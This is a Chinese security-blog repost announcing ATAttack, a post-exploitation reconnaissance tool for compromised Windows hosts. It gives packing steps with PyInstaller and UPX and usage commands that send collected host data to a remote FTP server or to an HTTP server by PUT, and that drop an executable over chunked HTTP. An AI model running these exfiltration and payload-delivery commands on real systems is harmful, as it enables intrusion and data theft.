【神兵利器】后渗透半自动化侦察Tools(附下载)

admin
admin
admin
71718
文章
49
评论
2023年1月29日18:26:26评论11 views字数 828阅读2分45秒阅读模式

0x01 前言

每获取一台机器权限,如果每次都手动操作重复一样的信息收集工作,无疑加大了工作量,既为了能更好的获取内网进一步突破点攻击面,这段闲暇时间造了个简易的轮子,其在真实环境中发现较多未知问题,欢迎大家踊跃提交 issue 和 PR !

0x02 简介

ATAttack款后渗透半自动化侦察工具,它从进攻性和防御性安全角度执行许多面向安全性的主机调查“安全检查”。

【神兵利器】后渗透半自动化侦察Tools(附下载)

0x03 打包ATAttack二进制文件

测试打包环境:
Python 2.7.15PyInstaller 3.4Windows 10
通过UPX压缩,使得ATAttack程序落地更小
下载UPX(测试环境upx-3.95-win64版本)https://github.com/upx/upx/releases
pip安装pyinstallerpip install pyinstaller
进入ATAttack目录,并通过upx压缩pyinstaller -F exploit.py --upx-dir=upx-3.95-win64
成功打包二进制控制台单文件ATAttackdist]exploit.exe

0x04 快照预览

Win10测试环境

【神兵利器】后渗透半自动化侦察Tools(附下载)

Win2008测试环境:

【神兵利器】后渗透半自动化侦察Tools(附下载)

0x05 使用方法

存储于本地临时文件夹:

python exploit.py

回传远程FTP服务器:

python exploit.py -t ftp_host -u ftp_user -p ftp_pwd

通过PUT请求回传http服务端

python exploit.py -d http://10.10.10.10:8000/

HTTP分块传输落地可执行文件

python http_client.py -d http://10.10.10.10./exploit.exe -u http://10.10.10.10:8000/

0x06 获取方式

https://github.com/c1y2m3/ATAttack

【神兵利器】后渗透半自动化侦察Tools(附下载)

原文始发于微信公众号(渗透Xiao白帽):【神兵利器】后渗透半自动化侦察Tools(附下载)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月29日18:26:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【神兵利器】后渗透半自动化侦察Tools(附下载) http://cn-sec.com/archives/1400179.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: